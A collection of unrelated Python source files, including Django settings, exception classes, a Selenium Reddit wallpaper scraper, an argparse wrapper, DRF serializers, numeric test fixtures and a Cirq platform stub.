DATASET = fixtures.DatasetFixtureFactory.dataset()
job_id = DATASET["id"]
DATASET["edit_iri"] = "http://whatever/"
ds = models.Dataset(DATASET)
ds.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
dataset_poll._do_poll(r, job_id)
|
import os
import dj_database_url
from authors.settings.base import *
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG')
ALLOWED_HOSTS = config('ALLOWED_HOSTS')
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, "static")
DATABASES = {
'default': dj_database_url.config(
default=config('DATABASE_URL')
)
}
|
class NoSuchRecord(Exception):
pass
class NoPrimaryKeyError(Exception):
pass
class DateParseFailed(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return self.msg
class InvalidExpressionError(Exception):
def __init__(self, expression: str):
self.expr = expression
def __str__(self):
return f"Invalid Expression `{self.expr}`."
class NotSupportedFilterError(Exception):
def __init__(self, filter_name: str):
self.filter_name = filter_name
def __str__(self):
return f"Filter type '{self.filter_name}' is not supported."
|
import sys
import os
import pprint
import time
import argparse
import random
from datetime import datetime
from typing import Dict, List
from io import BytesIO
import requests
import click
from selenium import webdriver
from youtube_dl import YoutubeDL
from imgur_downloader import ImgurDownloader
from PIL import Image
driver = None
this_dir = os.path.abspath(os.path.dirname(__file__))
subreddits_file = os.path.join(this_dir, "subreddits.txt")
def wait_for_internet():
click.secho("Ensuring that theres still an internet connection...", fg='red')
while True:
try:
req = requests.get("http://www.google.com", timeout=10)
req.raise_for_status()
return
except:
pass
def random_wait() -> None:
"""
Waits some time between requests/clicks, display a message to the user describing wait time
"""
seconds = random.randint(2, 4)
while seconds > 0:
click.secho("\rWaiting {} second(s)...".format(seconds), nl=False, fg="yellow")
sys.stdout.flush()
seconds -= 1
time.sleep(1)
print("\r", end="")
def get_subreddits():
"""Read and parse the ./subreddits.txt file"""
if not os.path.exists(subreddits_file):
print(f"{subreddits_file} does not exist!", file=sys.stderr)
sys.exit(1)
subreddits = {}
with open(subreddits_file, "r") as subreddits_f:
for line in filter(str.strip, subreddits_f.read().splitlines()):
subreddit_name, _, pages = line.partition(" ")
try:
subreddits[subreddit_name] = int(pages)
except ValueError:
print(
f"Could not interpret {pages} as an integer, parsed from {line}. Fix that line in {subreddits_file}",
file=sys.stderr,
)
sys.exit(1)
pprint.pprint(subreddits)
return subreddits
def create_webdriver():
global driver
if "WALLPAPER_DRIVER" in os.environ:
driver = webdriver.Chrome(os.environ["WALLPAPER_DRIVER"])
else:
driver = webdriver.Chrome()
def configure() -> Dict[str, int]:
"""Read config file and set up chromedriver"""
subreddits = get_subreddits()
create_webdriver()
return subreddits
def get_links(subreddit_list: Dict[str, int]) -> List[str]:
"""
Use selenium to get the links for each image from each subreddit
Saves a list of links to ./links.txt
"""
global driver
assert driver is not None
driver.get("https://old.reddit.com")
# prompt the user to log in
print("Logged in accounts see 100 posts instead of 25")
input("Log into your reddit account in the chromedriver. Press enter when you're done...")
for subreddit_name in subreddit_list:
subreddit_base = f"https://old.reddit.com/r/{subreddit_name}/"
print(f"Making sure {subreddit_base} exists...")
driver.get(subreddit_base)
random_wait()
assert driver.current_url.casefold() == subreddit_base.casefold()
# may be some links that arent images, those can be dealt with later/handled manually
image_links = []
for subreddit_name, number_of_pages in subreddit_list.items():
# first top page, sorted by all
driver.get(f"https://old.reddit.com/r/{subreddit_name}/top/?sort=top&t=all")
pages_left = int(number_of_pages)
while pages_left > 0:
images_found = 0
for post in driver.find_elements_by_css_selector("#siteTable > div.link"):
# if this is a promoted post/advertisement
if len(post.find_elements_by_css_selector(".promoted-tag")) == 0:
image_links.append(
post.find_element_by_css_selector("a.title").get_attribute("href")
)
images_found += 1
print(f"Added {images_found} possible images from {driver.current_url}")
random_wait()
# dont need to go to the next page when we're on the last one (1 page left)
if pages_left != 1:
# go to the next page
driver.find_element_by_css_selector("span.next-button").click()
pages_left -= 1
driver.quit()
with open(os.path.join(this_dir, "links.txt"), "w") as link_cache:
link_cache.write("\n".join(image_links))
return image_links
def download_images(image_links: List[str]):
os.makedirs(os.path.join(this_dir, "wallpapers"), exist_ok=True)
couldnt_download = open(os.path.join(this_dir, "failed.txt"), "a")
ydl = YoutubeDL({"outtmpl": "./wallpapers/%(title)s.%(ext)s"})
def_headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
for i, url in enumerate(image_links, 1):
click.secho(
f"({i}/{len(image_links)}) Trying to download: '{url}'...", fg="blue"
)
if "old.reddit.com" in url:
try:
# youtube-dl can download reddit videos
# it will fallback to parsing the page/downloading the content anyways
# so this works for any images which are not direct links to the image
ydl.download([url])
click.secho("Download succeeded!", fg="green")
random_wait()
except:
click.secho(f"Couldn't download '{url}'.", fg="red", err=True)
couldnt_download.write(f"{url}\n")
couldnt_download.flush()
wait_for_internet()
elif "imgur" in url:
try:
# this may fail if a URL not on imgur has imgur in the url, but I'm fine ignoring that
# case and going through the URL manually after its written to failed.txt
ImgurDownloader(
url,
dir_download=os.path.join(this_dir, "wallpapers"),
debug=True,
delete_dne=False,
).save_images()
click.secho("Download succeeded!", fg="green")
random_wait()
except Exception as e:
print(str(e))
click.secho(f"Couldn't download '{url}'.", fg="red", err=True)
couldnt_download.write(f"{url}\n")
couldnt_download.flush()
wait_for_internet()
else:
try:
r = requests.get(url, stream=True, headers=def_headers)
try:
Image.open(BytesIO(r.content)).save(
"./wallpapers/{}.png".format(datetime.now())
)
click.secho("Download succeeded!", fg="green")
except OSError as oe: # image failed to be parsed
click.echo(str(oe))
raise oe # re-raise so that the failed image decode gets written to failed.txt
random_wait()
except:
click.secho(f"Couldn't download '{url}'.", fg="red", err=True)
couldnt_download.write(f"{url}\n")
couldnt_download.flush()
wait_for_internet()
couldnt_download.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--use-links", help="use the links.txt instead of using selenium to generate new links", action="store_true", default=False, required=False)
args = parser.parse_args()
try:
if args.use_links:
with open('links.txt', 'r') as f:
links = list(map(str.strip, f.read().splitlines()))
else:
links = get_links(configure())
download_images(links)
finally:
if driver:
driver.quit()
|
from pathlib import Path
def homedirectory():
home=Path().resolve()
return home
home=homedirectory()
|
import os
import types
import functools
import configargparse
def path(x):
return str(x)
class ArgParser(configargparse.ArgParser):
@classmethod
def attach_methods(cls, target):
target.add_mutex_switch = \
types.MethodType(cls.add_mutex_switch, target)
target.a = types.MethodType(cls.a, target)
target.g = types.MethodType(cls.g, target)
target.add_group = types.MethodType(cls.add_group, target)
target.add_mutex_group = types.MethodType(cls.add_mutex_group, target)
target.add_mutex_switch = types.MethodType(cls.add_mutex_switch, target)
return target
def __init__(self, *args, allow_config=False, config_path_base=True,
**kwargs):
super(ArgParser, self).__init__(*args, fromfile_prefix_chars="@",
**kwargs)
self.a = types.MethodType(
functools.update_wrapper(ArgParser.a, ArgParser.add),
self)
self.g = types.MethodType(
functools.update_wrapper(ArgParser.g, ArgParser.add_argument_group),
self)
self.add_group = types.MethodType(
functools.update_wrapper(ArgParser.add_group,
ArgParser.add_argument_group),
self)
self.add_mutex_group = types.MethodType(
functools.update_wrapper(ArgParser.add_mutex_group,
ArgParser.add_mutually_exclusive_group),
self)
self.config_path_base = config_path_base
if allow_config:
self.add("--config", is_config_file=True)
def a(self, *args, **kwargs):
return self.add(*args, **kwargs)
def g(self, *args, **kwargs):
return self.add_group(*args, **kwargs)
def add_group(self, *args, **kwargs):
return self.add_argument_group(*args, **kwargs)
def add_argument_group(self, *args, **kwargs):
group = super(ArgParser, self).add_argument_group(*args, **kwargs)
group = self.attach_methods(group)
return group
def add_mutex_group(self):
return self.add_mutually_exclusive_group()
def add_mutex_switch(parser, dest, arguments=set(), default=None,
single_arg=False, required=False):
"""Adds mutually exclusive switch arguments.
Args:
arguments: a dictionary that maps switch name to helper text. Use
sets to skip help texts.
"""
if default is not None:
assert default in arguments
if isinstance(arguments, set):
arguments = {k: None for k in arguments}
if not single_arg:
mg = parser.add_mutually_exclusive_group(required=required)
for name, help_text in arguments.items():
kwargs = {
"action": "store_const",
"dest": dest,
"const": name,
"help": help_text
}
if default == name:
kwargs["default"] = name
mg.add_argument("--{}".format(name), **kwargs)
return mg
else:
kwargs = {
"dest": dest,
"type": str,
"default": default,
"help": "\n".join("{}: {}".format(k, v)
for k, v in arguments.items()),
"choices": list(arguments.keys())
}
return parser.add_argument("--{}".format(dest), **kwargs)
def _resolve_relative_path(self, args, base_path):
for action in self._actions:
if action.type != path:
continue
dest = action.dest
arg_val = getattr(args, dest, None)
if arg_val is None:
continue
def _resolve(path):
if not os.path.isabs(path):
return os.path.join(base_path, path)
return path
if isinstance(arg_val, list):
new_val = [_resolve(v) for v in arg_val]
else:
new_val = _resolve(arg_val)
setattr(args, dest, new_val)
def parse_args(self, *parsed_args, **kwargs):
parsed_args = super(ArgParser, self).parse_args(*parsed_args, **kwargs)
if hasattr(parsed_args, "config") and parsed_args.config is not None \
and self.config_path_base:
config_path = os.path.abspath(parsed_args.config)
work_path = os.path.dirname(config_path)
else:
work_path = os.getcwd()
self._resolve_relative_path(parsed_args, work_path)
return parsed_args
def __str__(self):
return "\n".join(["{}: {}".format(k, v) for k, v in vars()])
|
# Copyright 2018 Alex K (wtwf.com) All rights reserved.
"""
Find the search url (and the suggest url) for a site
gold standard (even if it's php and downloads the file)
http://www.gutenberg.org/
http://www.gutenberg.org/w/opensearch_desc.php
http://www.gutenberg.org/w/api.php?action=opensearch&search=arctic&namespace=0|4
also should support ld+json (doesn't seem to have suggest support)
https://developers.google.com/search/docs/data-types/sitelinks-searchbox
https://www.chewy.com/
other sites:
https://www.costco.com/
https://www.airbnb.com/opensearch.xml
https://www.crunchbase.com/opensearch.xml?version=2
https://www.labnol.org/
https://www.diigo.com/search/open_search
https://community.dremio.com/
https://domains.google/#/
https://earlyretirementnow.com/osd.xml
https://www.flickr.com/opensearch.xml
"""
__author__ = 'wtwf.com (Alex K)'
import json
import logging
import re
import urlparse
import HTMLParser
import xml.etree.ElementTree
import google.appengine.api.urlfetch
from wtwf import wtwfhandler
class FindHrefParser(HTMLParser.HTMLParser):
def reset(self):
HTMLParser.HTMLParser.reset(self)
self.hrefs = []
def handle_starttag(self, tag, attrs):
if 'href' in attrs:
self.hrefs.append(attrs['href'])
class FindOpensearchHandler(wtwfhandler.WtwfHandler):
def get(self):
url = self.request.get('url')
base = urlparse.urljoin(url, '/')
res = google.appengine.api.urlfetch.fetch(base)
content = res.content
# first try and find opensearch
opensearch_url = getOpenSearchUrl(res.content)
if opensearch_url:
res = google.appengine.api.urlfetch.fetch(urlparse.urljoin(base, opensearch_url))
search_and_suggest = getSearchAndSuggestFromOpenSearchXml(res.content)
# second try and find ld+json
def getOpenSearchUrl(page):
opensearch_re = re.compile(r'<[^>]*opensearchdescription\+xml[^>]*>')
match = opensearch_re.search(page)
if match:
parser = FindHrefParser()
parser.feed(match.group(0))
if len(parser.hrefs) > 0:
return parser.hrefs[0]
def getSearchAndSuggestFromOpenSearchXml(xml):
# xml parse that shit
root = xml.etree.ElementTree.fromstring(xml)
search = None
suggest = None
# get the Url elements (url, URL too)
root.find('url')
# if it's text/html it's the search url, get template, replace {searchTerms} with %s
# make sure it doesn't have &
# if it's application/x-suggestions+json then it's the suggest url
# if it only has application/x-suggestions+xml then that's messed up
if search or suggest:
return {search: search, suggest: suggest}
|
from rest_framework import viewsets, permissions
from languages.models import Paradigm
from languages.serializers import ParadigmSerializer
class ParadigmView(viewsets.ModelViewSet):
queryset = Paradigm.objects.all()
serializer_class = ParadigmSerializer
|
import logging
from .utils import importer
logger = logging.getLogger(__name__)
class Storage(object):
"""
Offers a standard set of methods and I/O on persistent data.
"""
def __init__(self, conf_dict=None):
pass
def get(self, k, default=None):
raise NotImplemented()
def update(self, ava):
raise NotImplemented()
def delete(self, k, v):
raise NotImplemented()
def __getitem__(self, k):
raise NotImplemented()
def __setitem__(self, k, v):
raise NotImplemented()
def __delitem__(self, v):
raise NotImplemented()
def __call__(self):
raise NotImplemented()
def __len__(self):
raise NotImplemented()
def __contains__(self, k):
raise NotImplemented()
def __iter__(self):
raise NotImplemented()
def synch(self):
raise NotImplemented()
def keys(self):
raise NotImplemented()
|
# Copyright (C) 2019 Verizon. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from rest_framework import serializers
from catalog.packages.const import NSDM_NOTIFICATION_TYPES
class NsdmNotificationsFilter(serializers.Serializer):
notificationTypes = serializers.ListField(
child=serializers.ChoiceField(
required=True,
choices=NSDM_NOTIFICATION_TYPES
),
help_text="Match particular notification types",
allow_null=False,
required=False
)
nsdInfoId = serializers.ListField(
child=serializers.CharField(),
help_text="Match NS packages with particular nsdInfoIds",
allow_null=False,
required=False
)
nsdId = serializers.ListField(
child=serializers.CharField(),
help_text="Match NS Packages with particular nsdIds",
allow_null=False,
required=False
)
nsdName = serializers.ListField(
child=serializers.CharField(
max_length=255,
required=True
),
help_text="Match NS Packages with particular nsdNames",
allow_null=False,
required=False
)
nsdVersion = serializers.ListField(
child=serializers.CharField(
max_length=255,
required=True
),
help_text="match NS packages that belong to certain nsdversion",
required=False,
allow_null=False
)
nsdInvariantId = serializers.ListField(
child=serializers.CharField(),
help_text="Match NS Packages with particular nsdInvariantIds",
allow_null=False,
required=False
)
vnfPkgIds = serializers.ListField(
child=serializers.CharField(),
help_text="Match NS Packages that has VNF PackageIds",
allow_null=False,
required=False
)
nestedNsdInfoIds = serializers.ListField(
child=serializers.CharField(),
help_text="Match NS Packages with particular nsdInvariantIds",
allow_null=False,
required=False
)
nsdOnboardingState = serializers.ListField(
child=serializers.ChoiceField(
required=True,
choices=[
'CREATED',
'UPLOADING',
'PROCESSING',
'ONBOARDED'
]
),
help_text="Match NS Packages with particular NS Onboarding State",
allow_null=False,
required=False
)
nsdOperationalState = serializers.ListField(
child=serializers.ChoiceField(
required=True,
choices=['ENABLED', 'DISABLED']
),
help_text="Match NS Packages with particular NS Operational State",
allow_null=False,
required=False
)
nsdUsageState = serializers.ListField(
child=serializers.ChoiceField(
required=True,
choices=['IN_USE', 'NOT_IN_USE']
),
help_text="Match NS Packages with particular NS Usage State",
allow_null=False,
required=False
)
pnfdInfoIds = serializers.ListField(
child=serializers.CharField(),
help_text="Match PF packages with particular pnfdInfoIds",
allow_null=False,
required=False
)
pnfdId = serializers.ListField(
child=serializers.CharField(),
help_text="Match PF packages with particular pnfdInfoIds",
allow_null=False,
required=False
)
pnfdName = serializers.ListField(
child=serializers.CharField(
max_length=255,
required=True
),
help_text="Match PF Packages with particular pnfdNames",
allow_null=False,
required=False
)
pnfdVersion = serializers.ListField(
child=serializers.CharField(
max_length=255,
required=True
),
help_text="match PF packages that belong to certain pnfd version",
required=False,
allow_null=False
)
pnfdProvider = serializers.ListField(
child=serializers.CharField(
max_length=255,
required=True
),
help_text="Match PF Packages with particular pnfdProvider",
allow_null=False,
required=False
)
pnfdInvariantId = serializers.ListField(
child=serializers.CharField(),
help_text="Match PF Packages with particular pnfdInvariantIds",
allow_null=False,
required=False
)
pnfdOnboardingState = serializers.ListField(
child=serializers.ChoiceField(
required=True,
choices=[
'CREATED',
'UPLOADING',
'PROCESSING',
'ONBOARDED'
]
),
help_text="Match PF Packages with particular PNF Onboarding State ",
allow_null=False,
required=False
)
pnfdUsageState = serializers.ListField(
child=serializers.ChoiceField(
required=True,
choices=['IN_USE', 'NOT_IN_USE']
),
help_text="Match PF Packages with particular PNF usage State",
allow_null=False,
required=False
)
|
from mpmath import mpf, mp, mpc
from UnitTesting.standard_constants import precision
mp.dps = precision
trusted_values_dict = {}
# Generated on: 2019-08-09
trusted_values_dict['FishBoneMoncriefID__FishboneMoncriefID__globals'] = {'hm1': mpf('-0.17148595535307850240978200068542'), 'rho_initial': mpf('0.284819845942236515284909115898924'), 'IDalpha': mpf('0.755931060760646734042892329127751'), 'IDgammaDD[0][0]': mpf('2.0385167763522174725280879252921'), 'IDgammaDD[0][1]': mpf('0.0765438379382772951846664774808896'), 'IDgammaDD[0][2]': mpf('0.570539327433565151458524763213205'), 'IDgammaDD[1][0]': mpf('0.0765438379382772951846664774808896'), 'IDgammaDD[1][1]': mpf('0.913606065931442108137857582766233'), 'IDgammaDD[1][2]': mpf('-0.103931622633820480927404911622589'), 'IDgammaDD[2][0]': mpf('0.570539327433565151458524763213205'), 'IDgammaDD[2][1]': mpf('-0.103931622633820480927404911622589'), 'IDgammaDD[2][2]': mpf('1.40437373720499632990640350854066'), 'IDKDD[0][0]': mpf('0.241372059893883246591607766283272'), 'IDKDD[0][1]': mpf('-0.343388055113192085165370755198259'), 'IDKDD[0][2]': mpf('-0.590459359927831888413702466883995'), 'IDKDD[1][0]': mpf('-0.343388055113192085165370755198259'), 'IDKDD[1][1]': mpf('0.401858289197972155074762087828211'), 'IDKDD[1][2]': mpf('-0.422578171813805727676385503332614'), 'IDKDD[2][0]': mpf('-0.590459359927831888413702466883995'), 'IDKDD[2][1]': mpf('-0.422578171813805727676385503332614'), 'IDKDD[2][2]': mpf('-0.0139298788083103948797345044429905'), 'IDbetaU[0]': mpf('0.21464758255634547847210936078832'), 'IDbetaU[1]': mpf('0.241217364020809745026116799650538'), 'IDbetaU[2]': mpf('0.281800155328952481540896834563867'), 'IDValencia3velocityU[0]': mpf('-0.0100201358532234154260289073441603'), 'IDValencia3velocityU[1]': mpf('0.580690518031488621148890984890519'), 'IDValencia3velocityU[2]': mpf('0.372785522327121194734739936270058')}
|
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
setup(
name='budweiser',
version='0.1',
description='Distributed file archiving state machine for messy directories',
long_description='',
keywords='filesystem sync rsync archiving beer',
url='https://github.com/lukebeer/budweiser',
author='Luke Berezynskyj (Aka Beer)',
author_email='mail@luke.beer',
license='MIT',
include_package_data=True,
packages=find_packages(),
install_requires=[
'redis',
],
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: System :: Archiving',
]
)
|
## _____ _____
## | __ \| __ \ AUTHOR: Pedro Rivero
## | |__) | |__) | ---------------------------------
## | ___/| _ / DATE: May 11, 2021
## | | | | \ \ ---------------------------------
## |_| |_| \_\ https://github.com/pedrorrivero
##
## Copyright 2021 Pedro Rivero
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
from typing import Tuple
from ..circuit import QuantumCircuit
from ..job import QuantumJob
from ..platform import QuantumPlatform, QuantumProtocol
###############################################################################
## CIRQ PLATFORM
###############################################################################
class CirqPlatform(QuantumPlatform):
def __init__(self) -> None:
self.ERROR_MSG = f"{self.__class__.__name__}" # TODO
raise NotImplementedError(self.ERROR_MSG)
############################### PUBLIC API ###############################
@property
def job_partition(self) -> Tuple[int, int]:
raise NotImplementedError(self.ERROR_MSG)
@property
def max_bits_per_request_allowed(self) -> int:
raise NotImplementedError(self.ERROR_MSG)
def create_circuit(self, num_qubits: int) -> QuantumCircuit:
raise NotImplementedError(self.ERROR_MSG)
def create_job(
self, circuit: QuantumCircuit, repetitions: int
) -> QuantumJob:
raise NotImplementedError(self.ERROR_MSG)
def fetch_random_bits(self, protocol: QuantumProtocol) -> str:
raise NotImplementedError(self.ERROR_MSG)
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from shutil import which
import time
options = Options()
#options.add_argument("--headless")
chrome_path = which("chromedriver")
driver = webdriver.Chrome(executable_path=chrome_path,chrome_options=options)#Options=chrome_options)
driver.get("https://duckduckgo.com")
search_input = driver.find_element_by_id("search_form_input_homepage")
search_input.send_keys("My User Agent")
# search_btn = driver.find_element_by_id("search_button_homepage")
# search_btn.click()
search_input.send_keys(Keys.ENTER)
print(driver.page_source)
time.sleep(300)
driver.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.